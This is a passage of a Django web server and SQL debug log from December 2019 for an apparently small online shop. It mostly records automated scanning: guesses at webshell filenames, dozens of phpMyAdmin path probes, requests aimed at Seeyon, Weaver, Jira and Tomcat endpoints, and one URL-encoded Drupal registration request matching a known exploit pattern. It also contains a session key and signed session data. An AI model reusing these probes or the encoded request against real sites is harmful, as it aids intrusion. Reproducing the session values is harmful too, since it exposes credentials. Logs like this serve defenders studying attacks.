/5201314.php [18/Dec/2019 01:08:25] "POST /5201314.php HTTP/1.0" 404 6454 Not Found: /fusheng.php [18/Dec/2019 01:08:25] "POST /fusheng.php HTTP/1.0" 404 6454 Not Found: /general.php [18/Dec/2019 01:08:26] "POST /general.php HTTP/1.0" 404 6454 Not Found: /repeat.php [18/Dec/2019 01:08:26] "POST /repeat.php HTTP/1.0" 404 6451 Not Found: /ldw.php [18/Dec/2019 01:08:26] "POST /ldw.php HTTP/1.0" 404 6442 Not Found: /api.php [18/Dec/2019 01:08:26] "POST /api.php HTTP/1.0" 404 6442 Not Found: /s1.php [18/Dec/2019 01:08:26] "POST /s1.php HTTP/1.0" 404 6439 Not Found: /hello.php [18/Dec/2019 01:08:26] "POST /hello.php HTTP/1.0" 404 6448 Not Found: /admn.php [18/Dec/2019 01:08:29] "POST /admn.php HTTP/1.0" 404 6445 Not Found: /hell.php [18/Dec/2019 01:08:29] "POST /hell.php HTTP/1.0" 404 6445 Not Found: /hell.php [18/Dec/2019 01:08:29] "POST /hell.php HTTP/1.0" 404 6445 Not Found: /xp.php [18/Dec/2019 01:08:30] "POST /xp.php HTTP/1.0" 404 6439 Not Found: /1.php [18/Dec/2019 01:08:30] "POST /1.php HTTP/1.0" 404 6436 Not Found: /2.php [18/Dec/2019 01:08:30] "POST /2.php HTTP/1.0" 404 6436 Not Found: /p.php [18/Dec/2019 01:08:30] "POST /p.php HTTP/1.0" 404 6436 Not Found: /1.php [18/Dec/2019 01:08:30] "POST /1.php HTTP/1.0" 404 6436 Not Found: /a.php [18/Dec/2019 01:08:31] "POST /a.php HTTP/1.0" 404 6436 Not Found: /m.php [18/Dec/2019 01:08:31] "POST /m.php HTTP/1.0" 404 6436 Not Found: /conf.php [18/Dec/2019 01:08:31] "POST /conf.php HTTP/1.0" 404 6445 Not Found: /123.php [18/Dec/2019 01:08:31] "POST /123.php HTTP/1.0" 404 6442 Not Found: /1234.php [18/Dec/2019 01:08:31] "POST /1234.php HTTP/1.0" 404 6445 Not Found: /HX.php [18/Dec/2019 01:08:31] "POST /HX.php HTTP/1.0" 404 6439 Not Found: /diy.php [18/Dec/2019 01:08:33] "POST /diy.php HTTP/1.0" 404 6442 Not Found: /666.php [18/Dec/2019 01:08:33] "POST /666.php HTTP/1.0" 404 6442 Not Found: /777.php [18/Dec/2019 01:08:33] "POST /777.php HTTP/1.0" 404 6442 Not Found: /qwq.php [18/Dec/2019 01:08:34] "POST /qwq.php HTTP/1.0" 404 6442 Not Found: /qwqw.php [18/Dec/2019 01:08:34] "POST /qwqw.php HTTP/1.0" 404 6445 Not Found: /.php [18/Dec/2019 01:08:34] "POST /.php HTTP/1.0" 404 6433 Not Found: /infos.php [18/Dec/2019 01:08:34] "POST /infos.php HTTP/1.0" 404 6448 Not Found: /x.php [18/Dec/2019 01:08:34] "POST /x.php HTTP/1.0" 404 6436 Not Found: /lucky.php [18/Dec/2019 01:08:34] "POST /lucky.php HTTP/1.0" 404 6448 Not Found: /zzk.php [18/Dec/2019 01:08:34] "POST /zzk.php HTTP/1.0" 404 6442 Not Found: /toor.php [18/Dec/2019 01:08:35] "POST /toor.php HTTP/1.0" 404 6445 Not Found: /uu.php [18/Dec/2019 01:08:35] "POST /uu.php HTTP/1.0" 404 6439 Not Found: /a.php [18/Dec/2019 01:08:35] "POST /a.php HTTP/1.0" 404 6436 Not Found: /aaa.php [18/Dec/2019 01:08:35] "POST /aaa.php HTTP/1.0" 404 6442 Not Found: /wb.php [18/Dec/2019 01:08:35] "POST /wb.php HTTP/1.0" 404 6439 Not Found: /yj.php [18/Dec/2019 01:08:35] "POST /yj.php HTTP/1.0" 404 6439 Not Found: /z.php [18/Dec/2019 01:08:35] "POST /z.php HTTP/1.0" 404 6436 Not Found: /7.php [18/Dec/2019 01:08:36] "POST /7.php HTTP/1.0" 404 6436 Not Found: /xiaoma.php [18/Dec/2019 01:08:36] "POST /xiaoma.php HTTP/1.0" 404 6451 Not Found: /xiaomae.php [18/Dec/2019 01:08:36] "POST /xiaomae.php HTTP/1.0" 404 6454 Not Found: /xiaomar.php [18/Dec/2019 01:08:36] "POST /xiaomar.php HTTP/1.0" 404 6454 Not Found: /qq.php [18/Dec/2019 01:08:37] "POST /qq.php HTTP/1.0" 404 6439 Not Found: /data.php [18/Dec/2019 01:08:37] "POST /data.php HTTP/1.0" 404 6445 Not Found: /log.php [18/Dec/2019 01:08:37] "POST /log.php HTTP/1.0" 404 6442 Not Found: /fack.php [18/Dec/2019 01:08:38] "POST /fack.php HTTP/1.0" 404 6445 Not Found: /angge.php [18/Dec/2019 01:08:38] "POST /angge.php HTTP/1.0" 404 6448 Not Found: /cxfm666.php [18/Dec/2019 01:08:38] "POST /cxfm666.php HTTP/1.0" 404 6454 Not Found: /db.php [18/Dec/2019 01:08:38] "POST /db.php HTTP/1.0" 404 6439 Not Found: /hacly.php [18/Dec/2019 01:08:38] "POST /hacly.php HTTP/1.0" 404 6448 Not Found: /xiaomo.php [18/Dec/2019 01:08:38] "POST /xiaomo.php HTTP/1.0" 404 6451 Not Found: /xiaoyu.php [18/Dec/2019 01:08:38] "POST /xiaoyu.php HTTP/1.0" 404 6451 Not Found: /xiaohei.php [18/Dec/2019 01:08:39] "POST /xiaohei.php HTTP/1.0" 404 6454 Not Found: /qq5262.php [18/Dec/2019 01:08:39] "POST /qq5262.php HTTP/1.0" 404 6451 Not Found: /lost.php [18/Dec/2019 01:08:39] "POST /lost.php HTTP/1.0" 404 6445 Not Found: /php.php [18/Dec/2019 01:08:39] "POST /php.php HTTP/1.0" 404 6442 Not Found: /win.php [18/Dec/2019 01:08:39] "POST /win.php HTTP/1.0" 404 6442 Not Found: /win1.php [18/Dec/2019 01:08:39] "POST /win1.php HTTP/1.0" 404 6445 Not Found: /linux.php [18/Dec/2019 01:08:39] "POST /linux.php HTTP/1.0" 404 6448 Not Found: /linux1.php [18/Dec/2019 01:08:40] "POST /linux1.php HTTP/1.0" 404 6451 Not Found: /CC.php [18/Dec/2019 01:08:40] "POST /CC.php HTTP/1.0" 404 6439 Not Found: /x.php [18/Dec/2019 01:08:40] "POST /x.php HTTP/1.0" 404 6436 Not Found: /lanke.php [18/Dec/2019 01:08:40] "POST /lanke.php HTTP/1.0" 404 6448 Not Found: /neko.php [18/Dec/2019 01:08:40] "POST /neko.php HTTP/1.0" 404 6445 Not Found: /super.php [18/Dec/2019 01:08:40] "POST /super.php HTTP/1.0" 404 6448 Not Found: /cer.php [18/Dec/2019 01:08:40] "POST /cer.php HTTP/1.0" 404 6442 Not Found: /cere.php [18/Dec/2019 01:08:41] "POST /cere.php HTTP/1.0" 404 6445 Not Found: /aaa.php [18/Dec/2019 01:08:41] "POST /aaa.php HTTP/1.0" 404 6442 Not Found: /Administrator.php [18/Dec/2019 01:08:41] "POST /Administrator.php HTTP/1.0" 404 6472 Not Found: /liangchen.php [18/Dec/2019 01:08:41] "POST /liangchen.php HTTP/1.0" 404 6460 Not Found: /lucky.php [18/Dec/2019 01:08:41] "POST /lucky.php HTTP/1.0" 404 6448 Not Found: /meng.php [18/Dec/2019 01:08:41] "POST /meng.php HTTP/1.0" 404 6445 Not Found: /mysql.php [18/Dec/2019 01:08:45] "POST /mysql.php HTTP/1.0" 404 6448 Not Found: /seeyon/htmlofficeservlet [18/Dec/2019 01:08:49] "GET /%73%65%65%79%6F%6E/%68%74%6D%6C%6F%66%66%69%63%65%73%65%72%76%6C%65%74 HTTP/1.0" 404 6492 Not Found: /secure/ContactAdministrators!default.jspa [18/Dec/2019 01:08:49] "GET /secure/ContactAdministrators!default.jspa HTTP/1.0" 404 6543 Not Found: /weaver/bsh.servlet.BshServlet [18/Dec/2019 01:08:49] "GET /weaver/bsh.servlet.BshServlet HTTP/1.0" 404 6507 DEBUG 2019-12-18 01:08:50,021 utils 4252 140031747061504 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'solr'; args=('solr',) Not Found: /solr/ [18/Dec/2019 01:08:50] "GET /solr/ HTTP/1.0" 404 1724 Not Found: /index.php [18/Dec/2019 01:08:50] "POST /index.php HTTP/1.0" 404 6448 Not Found: /user/register [18/Dec/2019 01:08:50] "POST /%75%73%65%72/%72%65%67%69%73%74%65%72?%65%6c%65%6d%65%6e%74%5f%70%61%72%65%6e%74%73=%74%69%6d%65%7a%6f%6e%65%2f%74%69%6d%65%7a%6f%6e%65%2f%23%76%61%6c%75%65&%61%6a%61%78%5f%66%6f%72%6d=1&%5f%77%72%61%70%70%65%72%5f%66%6f%72%6d%61%74=%64%72%75%70%61%6c%5f%61%6a%61%78 HTTP/1.0" 404 6697 [18/Dec/2019 01:08:50] "GET / HTTP/1.0" 302 0 Not Found: /user.php [18/Dec/2019 01:08:50] "POST /%75%73%65%72%2e%70%68%70 HTTP/1.0" 404 6445 Not Found: /index.php [18/Dec/2019 01:08:50] "GET /index.php HTTP/1.0" 404 6447 Not Found: /phpmyadmin/index.php [18/Dec/2019 01:08:50] "GET /phpmyadmin/index.php HTTP/1.0" 404 6480 Not Found: /phpMyAdmin/index.php [18/Dec/2019 01:08:50] "GET /phpMyAdmin/index.php HTTP/1.0" 404 6480 Not Found: /pmd/index.php [18/Dec/2019 01:08:51] "GET /pmd/index.php HTTP/1.0" 404 6459 Not Found: /pma/index.php [18/Dec/2019 01:08:51] "GET /pma/index.php HTTP/1.0" 404 6459 Not Found: /PMA/index.php [18/Dec/2019 01:08:51] "GET /PMA/index.php HTTP/1.0" 404 6459 Not Found: /PMA2/index.php [18/Dec/2019 01:08:51] "GET /PMA2/index.php HTTP/1.0" 404 6462 Not Found: /pmamy/index.php [18/Dec/2019 01:08:51] "GET /pmamy/index.php HTTP/1.0" 404 6465 Not Found: /pmamy2/index.php [18/Dec/2019 01:08:51] "GET /pmamy2/index.php HTTP/1.0" 404 6468 Not Found: /mysql/index.php [18/Dec/2019 01:08:51] "GET /mysql/index.php HTTP/1.0" 404 6465 Not Found: /admin/index.php [18/Dec/2019 01:08:53] "GET /admin/index.php HTTP/1.0" 404 8892 Not Found: /db/index.php [18/Dec/2019 01:08:53] "GET /db/index.php HTTP/1.0" 404 6456 Not Found: /dbadmin/index.php [18/Dec/2019 01:08:53] "GET /dbadmin/index.php HTTP/1.0" 404 6471 Not Found: /web/phpMyAdmin/index.php [18/Dec/2019 01:08:54] "GET /web/phpMyAdmin/index.php HTTP/1.0" 404 6492 Not Found: /admin/pma/index.php [18/Dec/2019 01:08:54] "GET /admin/pma/index.php HTTP/1.0" 404 8904 Not Found: /admin/PMA/index.php [18/Dec/2019 01:08:54] "GET /admin/PMA/index.php HTTP/1.0" 404 8904 Not Found: /admin/mysql/index.php [18/Dec/2019 01:08:54] "GET /admin/mysql/index.php HTTP/1.0" 404 8910 Not Found: /admin/mysql2/index.php [18/Dec/2019 01:08:54] "GET /admin/mysql2/index.php HTTP/1.0" 404 8913 Not Found: /admin/phpmyadmin/index.php [18/Dec/2019 01:08:55] "GET /admin/phpmyadmin/index.php HTTP/1.0" 404 8925 Not Found: /admin/phpMyAdmin/index.php [18/Dec/2019 01:08:55] "GET /admin/phpMyAdmin/index.php HTTP/1.0" 404 8925 Not Found: /admin/phpmyadmin2/index.php [18/Dec/2019 01:08:55] "GET /admin/phpmyadmin2/index.php HTTP/1.0" 404 8928 Not Found: /mysqladmin/index.php [18/Dec/2019 01:08:55] "GET /mysqladmin/index.php HTTP/1.0" 404 6480 Not Found: /mysql-admin/index.php [18/Dec/2019 01:08:55] "GET /mysql-admin/index.php HTTP/1.0" 404 6483 Not Found: /mysql_admin/index.php [18/Dec/2019 01:08:55] "GET /mysql_admin/index.php HTTP/1.0" 404 6483 Not Found: /phpAdmin/index.php [18/Dec/2019 01:08:57] "GET /phpAdmin/index.php HTTP/1.0" 404 6474 Not Found: /phpmyadmin0/index.php [18/Dec/2019 01:08:57] "GET /phpmyadmin0/index.php HTTP/1.0" 404 6483 Not Found: /phpmyadmin1/index.php [18/Dec/2019 01:08:57] "GET /phpmyadmin1/index.php HTTP/1.0" 404 6483 Not Found: /phpmyadmin2/index.php [18/Dec/2019 01:08:58] "GET /phpmyadmin2/index.php HTTP/1.0" 404 6483 Not Found: /phpMyAdmin-4.4.0/index.php [18/Dec/2019 01:08:58] "GET /phpMyAdmin-4.4.0/index.php HTTP/1.0" 404 6498 Not Found: /phpMyAdmin4.8.0/index.php [18/Dec/2019 01:08:58] "GET /phpMyAdmin4.8.0/index.php HTTP/1.0" 404 6495 Not Found: /phpMyAdmin4.8.1/index.php [18/Dec/2019 01:08:58] "GET /phpMyAdmin4.8.1/index.php HTTP/1.0" 404 6495 Not Found: /phpMyAdmin4.8.2/index.php [18/Dec/2019 01:08:58] "GET /phpMyAdmin4.8.2/index.php HTTP/1.0" 404 6495 Not Found: /phpMyAdmin4.8.3/index.php [18/Dec/2019 01:08:58] "GET /phpMyAdmin4.8.3/index.php HTTP/1.0" 404 6495 Not Found: /phpMyAdmin4.8.4/index.php [18/Dec/2019 01:08:58] "GET /phpMyAdmin4.8.4/index.php HTTP/1.0" 404 6495 Not Found: /phpMyAdmin4.8.5/index.php [18/Dec/2019 01:08:58] "GET /phpMyAdmin4.8.5/index.php HTTP/1.0" 404 6495 Not Found: /myadmin/index.php [18/Dec/2019 01:08:59] "GET /myadmin/index.php HTTP/1.0" 404 6471 Not Found: /myadmin2/index.php [18/Dec/2019 01:08:59] "GET /myadmin2/index.php HTTP/1.0" 404 6474 Not Found: /xampp/phpmyadmin/index.php [18/Dec/2019 01:08:59] "GET /xampp/phpmyadmin/index.php HTTP/1.0" 404 6498 Not Found: /phpMyadmin_bak/index.php [18/Dec/2019 01:08:59] "GET /phpMyadmin_bak/index.php HTTP/1.0" 404 6492 Not Found: /www/phpMyAdmin/index.php [18/Dec/2019 01:09:00] "GET /www/phpMyAdmin/index.php HTTP/1.0" 404 6492 Not Found: /tools/phpMyAdmin/index.php [18/Dec/2019 01:09:00] "GET /tools/phpMyAdmin/index.php HTTP/1.0" 404 6498 Not Found: /phpmyadmin-old/index.php [18/Dec/2019 01:09:00] "GET /phpmyadmin-old/index.php HTTP/1.0" 404 6492 Not Found: /phpMyAdminold/index.php [18/Dec/2019 01:09:00] "GET /phpMyAdminold/index.php HTTP/1.0" 404 6489 Not Found: /phpMyAdmin.old/index.php [18/Dec/2019 01:09:00] "GET /phpMyAdmin.old/index.php HTTP/1.0" 404 6492 Not Found: /pma-old/index.php [18/Dec/2019 01:09:00] "GET /pma-old/index.php HTTP/1.0" 404 6471 Not Found: /claroline/phpMyAdmin/index.php [18/Dec/2019 01:09:00] "GET /claroline/phpMyAdmin/index.php HTTP/1.0" 404 6510 Not Found: /typo3/phpmyadmin/index.php [18/Dec/2019 01:09:01] "GET /typo3/phpmyadmin/index.php HTTP/1.0" 404 6498 Not Found: /phpma/index.php [18/Dec/2019 01:09:01] "GET /phpma/index.php HTTP/1.0" 404 6465 Not Found: /phpmyadmin/phpmyadmin/index.php [18/Dec/2019 01:09:01] "GET /phpmyadmin/phpmyadmin/index.php HTTP/1.0" 404 6513 Not Found: /phpMyAdmin/phpMyAdmin/index.php [18/Dec/2019 01:09:02] "GET /phpMyAdmin/phpMyAdmin/index.php HTTP/1.0" 404 6513 Not Found: /phpMyAbmin/index.php [18/Dec/2019 01:09:02] "GET /phpMyAbmin/index.php HTTP/1.0" 404 6480 Not Found: /phpMyAdmin__/index.php [18/Dec/2019 01:09:02] "GET /phpMyAdmin__/index.php HTTP/1.0" 404 6486 Not Found: /phpMyAdmin+++---/index.php [18/Dec/2019 01:09:02] "GET /phpMyAdmin+++---/index.php HTTP/1.0" 404 6498 Not Found: /v/index.php [18/Dec/2019 01:09:02] "GET /v/index.php HTTP/1.0" 404 6453 Not Found: /phpmyadm1n/index.php [18/Dec/2019 01:09:02] "GET /phpmyadm1n/index.php HTTP/1.0" 404 6480 Not Found: /phpMyAdm1n/index.php [18/Dec/2019 01:09:02] "GET /phpMyAdm1n/index.php HTTP/1.0" 404 6480 Not Found: /shaAdmin/index.php [18/Dec/2019 01:09:03] "GET /shaAdmin/index.php HTTP/1.0" 404 6474 Not Found: /phpMyadmi/index.php [18/Dec/2019 01:09:03] "GET /phpMyadmi/index.php HTTP/1.0" 404 6477 Not Found: /phpMyAdmion/index.php [18/Dec/2019 01:09:03] "GET /phpMyAdmion/index.php HTTP/1.0" 404 6483 Not Found: /s/index.php [18/Dec/2019 01:09:03] "GET /s/index.php HTTP/1.0" 404 6453 Not Found: /MyAdmin/index.php [18/Dec/2019 01:09:03] "GET /MyAdmin/index.php HTTP/1.0" 404 6471 Not Found: /phpMyAdmin1/index.php [18/Dec/2019 01:09:03] "GET /phpMyAdmin1/index.php HTTP/1.0" 404 6483 Not Found: /phpMyAdmin123/index.php [18/Dec/2019 01:09:03] "GET /phpMyAdmin123/index.php HTTP/1.0" 404 6489 Not Found: /pwd/index.php [18/Dec/2019 01:09:03] "GET /pwd/index.php HTTP/1.0" 404 6459 Not Found: /phpMyAdmina/index.php [18/Dec/2019 01:09:04] "GET /phpMyAdmina/index.php HTTP/1.0" 404 6483 Not Found: /phpMydmin/index.php [18/Dec/2019 01:09:04] "GET /phpMydmin/index.php HTTP/1.0" 404 6477 Not Found: /phpMyAdmins/index.php [18/Dec/2019 01:09:04] "GET /phpMyAdmins/index.php HTTP/1.0" 404 6483 Not Found: /phpMyAdmin._/index.php [18/Dec/2019 01:09:04] "GET /phpMyAdmin._/index.php HTTP/1.0" 404 6486 Not Found: /phpMyAdmin._2/index.php [18/Dec/2019 01:09:04] "GET /phpMyAdmin._2/index.php HTTP/1.0" 404 6489 Not Found: /phpmyadmin2222/index.php [18/Dec/2019 01:09:04] "GET /phpmyadmin2222/index.php HTTP/1.0" 404 6492 Not Found: /phpMyAdmin333/index.php [18/Dec/2019 01:09:04] "GET /phpMyAdmin333/index.php HTTP/1.0" 404 6489 Not Found: /phpmyadmin3333/index.php [18/Dec/2019 01:09:05] "GET /phpmyadmin3333/index.php HTTP/1.0" 404 6492 Not Found: /php2MyAdmin/index.php [18/Dec/2019 01:09:05] "GET /php2MyAdmin/index.php HTTP/1.0" 404 6483 Not Found: /phpiMyAdmin/index.php [18/Dec/2019 01:09:05] "GET /phpiMyAdmin/index.php HTTP/1.0" 404 6483 Not Found: /phpNyAdmin/index.php [18/Dec/2019 01:09:05] "GET /phpNyAdmin/index.php HTTP/1.0" 404 6480 Not Found: /1/index.php [18/Dec/2019 01:09:05] "GET /1/index.php HTTP/1.0" 404 6453 Not Found: /download/index.php [18/Dec/2019 01:09:05] "GET /download/index.php HTTP/1.0" 404 6474 Not Found: /phpmadmin/index.php [18/Dec/2019 01:09:09] "GET /phpmadmin/index.php HTTP/1.0" 404 6477 Not Found: /321/index.php [18/Dec/2019 01:09:09] "GET /321/index.php HTTP/1.0" 404 6459 Not Found: /123131/index.php [18/Dec/2019 01:09:09] "GET /123131/index.php HTTP/1.0" 404 6468 Not Found: /phpMyAdminn/index.php [18/Dec/2019 01:09:10] "GET /phpMyAdminn/index.php HTTP/1.0" 404 6483 Not Found: /phpMyAdminhf/index.php [18/Dec/2019 01:09:10] "GET /phpMyAdminhf/index.php HTTP/1.0" 404 6486 Not Found: /sbb/index.php [18/Dec/2019 01:09:10] "GET /sbb/index.php HTTP/1.0" 404 6459 Not Found: /WWW/phpMyAdmin/index.php [18/Dec/2019 01:09:10] "GET /WWW/phpMyAdmin/index.php HTTP/1.0" 404 6492 Not Found: /phpMyAdmln/index.php [18/Dec/2019 01:09:10] "GET /phpMyAdmln/index.php HTTP/1.0" 404 6480 Not Found: /phpMyAdmin_ai/index.php [18/Dec/2019 01:09:10] "GET /phpMyAdmin_ai/index.php HTTP/1.0" 404 6489 Not Found: /program/index.php [18/Dec/2019 01:09:13] "GET /program/index.php HTTP/1.0" 404 6471 Not Found: /phppma/index.php [18/Dec/2019 01:09:20] "GET /phppma/index.php HTTP/1.0" 404 6468 Not Found: /phpmy/index.php [18/Dec/2019 01:09:20] "GET /phpmy/index.php HTTP/1.0" 404 6465 Not Found: /mysql/admin/index.php [18/Dec/2019 01:09:20] "GET /mysql/admin/index.php HTTP/1.0" 404 6483 Not Found: /mysql/dbadmin/index.php [18/Dec/2019 01:09:21] "GET /mysql/dbadmin/index.php HTTP/1.0" 404 6489 Not Found: /mysql/sqlmanager/index.php [18/Dec/2019 01:09:21] "GET /mysql/sqlmanager/index.php HTTP/1.0" 404 6498 Not Found: /mysql/mysqlmanager/index.php [18/Dec/2019 01:09:21] "GET /mysql/mysqlmanager/index.php HTTP/1.0" 404 6504 Not Found: /wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php [18/Dec/2019 01:09:22] "GET /wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php HTTP/1.0" 404 6597 Not Found: /sqladmin/index.php [18/Dec/2019 01:09:22] "GET /sqladmin/index.php HTTP/1.0" 404 6474 Not Found: /sql/index.php [18/Dec/2019 01:09:22] "GET /sql/index.php HTTP/1.0" 404 6459 Not Found: /SQL/index.php [18/Dec/2019 01:09:22] "GET /SQL/index.php HTTP/1.0" 404 6459 Not Found: /websql/index.php [18/Dec/2019 01:09:22] "GET /websql/index.php HTTP/1.0" 404 6468 Not Found: /MySQLAdmin/index.php [18/Dec/2019 01:09:22] "GET /MySQLAdmin/index.php HTTP/1.0" 404 6480 Not Found: /manager/html [18/Dec/2019 01:09:22] "GET /manager/html HTTP/1.0" 404 6456 [18/Dec/2019 01:10:05] "GET / HTTP/1.0" 302 0 [18/Dec/2019 01:15:08] "GET / HTTP/1.0" 302 0 [18/Dec/2019 01:20:11] "GET / HTTP/1.0" 302 0 [18/Dec/2019 01:25:13] "GET / HTTP/1.0" 302 0 [18/Dec/2019 01:30:16] "GET / HTTP/1.0" 302 0 [18/Dec/2019 01:35:18] "GET / HTTP/1.0" 302 0 [18/Dec/2019 01:45:04] "GET / HTTP/1.0" 302 0 [18/Dec/2019 01:50:06] "GET / HTTP/1.0" 302 0 [18/Dec/2019 01:56:12] "GET / HTTP/1.0" 302 0 [18/Dec/2019 02:03:13] "GET / HTTP/1.0" 302 0 [18/Dec/2019 02:10:04] "GET / HTTP/1.0" 302 0 [18/Dec/2019 02:15:06] "GET / HTTP/1.0" 302 0 [18/Dec/2019 02:20:38] "GET / HTTP/1.0" 302 0 [18/Dec/2019 02:25:41] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-18 07:37:05,270 utils 4252 140031747061504 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-18T07:37:05.254086+00:00'::timestamptz AND "django_session"."session_key" = 'd7pf9z12rq486ubfvq2gsrikii6tex3m'); args=(datetime.datetime(2019, 12, 18, 7, 37, 5, 254086, tzinfo=), 'd7pf9z12rq486ubfvq2gsrikii6tex3m') DEBUG 2019-12-18 07:37:05,274 utils 4252 140031747061504 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-18 07:37:05,327 utils 4252 140031747061504 (0.005) SELECT "django_admin_log"."id", "django_admin_log"."action_time", "django_admin_log"."user_id", "django_admin_log"."content_type_id", "django_admin_log"."object_id", "django_admin_log"."object_repr", "django_admin_log"."action_flag", "django_admin_log"."change_message", "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined", "django_content_type"."id", "django_content_type"."app_label", "django_content_type"."model" FROM "django_admin_log" INNER JOIN "auth_user" ON ("django_admin_log"."user_id" = "auth_user"."id") LEFT OUTER JOIN "django_content_type" ON ("django_admin_log"."content_type_id" = "django_content_type"."id") WHERE "django_admin_log"."user_id" = 6 ORDER BY "django_admin_log"."action_time" DESC LIMIT 10; args=(6,) DEBUG 2019-12-18 07:37:05,341 utils 4252 140031747061504 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2020-01-01T07:37:05.339265+00:00'::timestamptz WHERE "django_session"."session_key" = 'd7pf9z12rq486ubfvq2gsrikii6tex3m'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2020, 1, 1, 7, 37, 5, 339265, tzinfo=), 'd7pf9z12rq486ubfvq2gsrikii6tex3m') [18/Dec/2019 07:37:05] "GET / HTTP/1.0" 200 8208 DEBUG 2019-12-18 07:37:05,345 utils 4252 140031732287232 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-18 07:37:05,358 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-18 07:37:05,364 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-18 07:37:05,368 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-18 07:37:05,374 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-18 07:37:05,378 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-18 07:37:05,382 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-18 07:37:05,386 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-18 07:37:05,390 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" 